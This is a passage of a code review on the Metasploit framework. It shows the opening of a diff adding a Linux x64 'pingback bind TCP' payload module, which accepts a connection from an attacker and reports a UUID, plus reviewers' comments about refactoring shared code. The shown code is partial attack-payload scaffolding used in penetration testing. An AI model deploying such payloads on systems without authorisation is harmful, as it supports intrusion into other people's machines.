modules/payloads/singles/linux/x64/pingback_bind_tcp.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/pingback'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/pingback'
+
+
+module MetasploitModule
+
+  CachedSize = 109
+
+  include Msf::Payload::Linux
+  include Msf::Payload::Single
+  include Msf::Payload::Pingback
+  include Msf::Payload::Pingback::Options
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux x64 Pingback, Bind TCP Inline',
+      'Description'   => 'Accept a connection from attacker and report UUID (Linux x64)',
+      'Author'        => [ 'bwatters-r7' ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::Pingback
+    ))
+    def generate_stage
+      # 22 -> "0x00,0x16"
+      # 4444 -> "0x11,0x5c"
+      encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
+      encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first
+      encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
+      pingback_uuid ||= generate_pingback_uuid
+      uuid_as_db = "0x" + pingback_uuid.to_s.gsub("-", "").chars.each_slice(2).map(&:join).join(",0x")
+      seconds = 5.0
+      sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
```

Comment:
All this is repeated often enough that it would make sense to have convenience methods in the `Msf::Payload::Pingback` mixin. Not necessary to land, but it will make it easier for the community to make new ones of these.

Reply:
Thus was unused in a lot of the payloads it was in; I just removed it.

Reply:
Works for me, we can factor out what is actually used later.